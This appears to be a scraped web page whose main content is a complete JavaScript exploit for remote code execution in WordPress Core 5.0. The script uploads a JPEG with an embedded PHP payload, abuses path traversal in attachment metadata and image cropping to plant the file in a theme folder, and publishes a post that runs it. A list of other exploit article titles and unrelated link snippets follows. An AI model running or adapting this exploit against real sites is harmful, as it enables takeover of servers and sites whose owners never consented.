var wpnonce = '';

var ajaxnonce = '';

var wp_attached_file = '';

var imgurl = '';

var postajaxdata = '';

var post_id = 0;

var cmd = '<?php phpinfo();/*';

var cmdlen = cmd.length

var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';

var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

var byteArray = Uint8Array.from(img, function(c){return c.codePointAt(0);});

var attachurl = '/wp-admin/media-new.php';

var uploadurl = '/wp-admin/async-upload.php';

var editattachurl = '/wp-admin/post.php?post=PID&action=edit';

var editposturl = '/wp-admin/post.php';

var addposturl = '/wp-admin/post-new.php';

var cropurl = '/wp-admin/admin-ajax.php';

console.log("Get wpnonce token.");

jQuery.get(attachurl, function(data) {

    wpnonce = jQuery(data).find('#file-form #_wpnonce').val();

    if(wpnonce) {

        console.log("Success! wpnonce: " + wpnonce);

        var postdata = new FormData();

        postdata.append('name', 'ebaldremal.jpg');

        postdata.append('post_id', post_id);

        postdata.append('_wpnonce', wpnonce);

        postdata.append('short', 1);

        // file

        var phpimage = new File([byteArray], 'ebaldremal.jpg');

        postdata.append('async-upload', phpimage);

        console.log("Upload image with shell.");

        jQuery.ajax({

            url: uploadurl,

            data: postdata,

            cache: false,

            contentType: false,

            processData: false,

            method: 'POST',

            success: function(data){

                if(jQuery.isNumeric(data)) {

                    post_id = data;

                    console.log("Success! Attach ID: " + post_id);

                    console.log("Get wpnonce for edit post, ajax_nonce for crop and URL for fun.");

                    jQuery.get(editattachurl.replace('PID', post_id), function(data) {

                        var btnid = "#imgedit-open-btn-" + post_id;

                        wpnonce = jQuery(data).find('#post #_wpnonce').val();

                        ajaxnonce = jQuery(data).find(btnid).attr('onclick').match(/[a-f0-9]{10}/)[0];

                        imgurl = new URL(jQuery(data).find('#attachment_url').val());

                        wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/any";

                        console.log("Success! wpnonce: " + wpnonce + ", ajaxnonce: " + ajaxnonce);

                        if(wpnonce && ajaxnonce) {

                            console.log("Update _wp_attached_file meta key to: " + wp_attached_file);

                            postdata = {

                                '_wpnonce': wpnonce,

                                'action': 'editpost',

                                'post_ID': post_id,

                                'meta_input[_wp_attached_file]': wp_attached_file

                            }

                            jQuery.post(editposturl, postdata, function(data){

                                console.log("Success!");

                                console.log("Crop image for create help folder.");

                                postajaxdata = {

                                    '_ajax_nonce': ajaxnonce,

                                    'action': 'crop-image',

                                    'id': post_id,

                                    'cropDetails[width]': 1,

                                    'cropDetails[height]': 1

                                }

                                jQuery.post(cropurl, postajaxdata, function(data){

                                    console.log("Success! Help directory created.");

                                    wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/../../../../themes/twentynineteen/owned";

                                    console.log("Update _wp_attached_file meta key to: " + wp_attached_file);

                                    postdata = {

                                        '_wpnonce': wpnonce,

                                        'action': 'editpost',

                                        'post_ID': post_id,

                                        'meta_input[_wp_attached_file]': wp_attached_file

                                    }

                                    jQuery.post(editposturl, postdata, function(data){

                                        console.log("Success!");

                                        console.log("Crop image for create evil jpg image inside twentynineteen theme folder.");

                                        jQuery.post(cropurl, postajaxdata, function(data){

                                            console.log("Success!");

                                            console.log("Get wpnonce for create new post.");

                                            jQuery.get(addposturl, function(data){

                                                console.log("Create new post and use evil jpg image as template.");

                                                if(jQuery(data).find('form.metabox-base-form').length) {

                                                    wpnonce = jQuery(data).find('form.metabox-base-form #_wpnonce').val();

                                                    post_id = jQuery(data).find('form.metabox-base-form #post_ID').val();

                                                } else {

                                                    wpnonce = jQuery(data).find('#post #_wpnonce').val();

                                                    post_id = jQuery(data).find('#post #post_ID').val();

                                                }

                                                postdata = {

                                                    '_wpnonce': wpnonce,

                                                    'action': 'editpost',

                                                    'post_ID': post_id,

                                                    'post_title': 'RCE-HERE',

                                                    'visibility': 'public',

                                                    'publish': 'Publish',

                                                    'meta_input[_wp_page_template]': 'cropped-owned.jpg'

                                                }

                                                jQuery.post(editposturl, postdata, function(data){

                                                    console.log("Success! Browse post with id = " + post_id + " to trigger RCE.")

                                                    console.log("Trying to open: " + imgurl.origin + "/?p=" + post_id + ")");

                                                    window.open(imgurl.origin + "/?p=" + post_id, '_blank');

                                                });

                                            });

                                        });

                                    });

                                });

                            });

                        }

                    });

                }

            }

        });

    }

});

[EXP]WordPress Core 5.0 - Remote Code Execution的更多相关文章

  1. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  2. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  3. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  4. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  5. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  6. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  7. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

  8. [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability

    漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...

  9. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

随机推荐

  1. ThinkPHP 二维码生成

    请求获取并展示二维码 <img src="<?php echo U('createCode?zsnumber='.$time.$kcname['id'].$stuInfo['id ...

  2. SQL错误

    一.mybatis框架XML错误 1.ORA-00918: 未明确定义列:SQL语句中列明重复,或者定义不明确(关联查询时两张表都有要区分开列明) 2.无效的列类型: 1111  :a.传入数据漏传一 ...

  3. 02 Django配置信息

    2-1 基本配置信息 import os # 项目路径 BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # ...

  4. mysql order by 中文 排序

    mysql order by 中文 排序 1. 在MySQL中,我们经常会对一个字段进行排序查询,但进行中文排序和查找的时候,对汉字的排序和查找结果往往都是错误的. 这种情况在MySQL的很多版本中都 ...

  5. Python处理微信利器——itchat

    接触itchat是一个偶然,上知乎刷出一个有意思的文章.于是乎运行源码,调错加上查阅博客,发现itchat大有可为. 知乎链接:https://zhuanlan.zhihu.com/p/2578293 ...

  6. Gym-101102-K-Topological Sort

    K. Topological Sort 题面 Consider a directed graph G of N nodes and all edges (u→v) such that u < v ...

  7. 工作总结(二):Web Design

    PHP框架:CakePHP 前端框架:Bootstrap Payment Data Transfer:https://developer.paypal.com/docs/classic/paypal- ...

  8. 二分搜素——(lower_bound and upper_bound)

    因为每个人二分的风格不同,所以在学习二分的时候总是被他们的风格搞晕.有的人二分风格是左闭右开也就是[L,R),有的人是左开右闭的(L,R]. 二分的最基本条件是,二分的序列需要有单调性. 下面介绍的时 ...

  9. execl 导入

    /** * 导入Excel功能   是把execl表中的数据添加到数据表中 */ public function import(){ if (!empty($_FILES)) { $file = re ...

  10. linux命令 find的应用

    1.列出当前目录及子目录下所有文件和文件夹 2.在 /home目录下查找以 “.txt”结尾的文件名 3.在当前目录下查找所有以“.txt”结尾的文件 4基于目录深度搜索(向下最大深度限制为3) 5. ...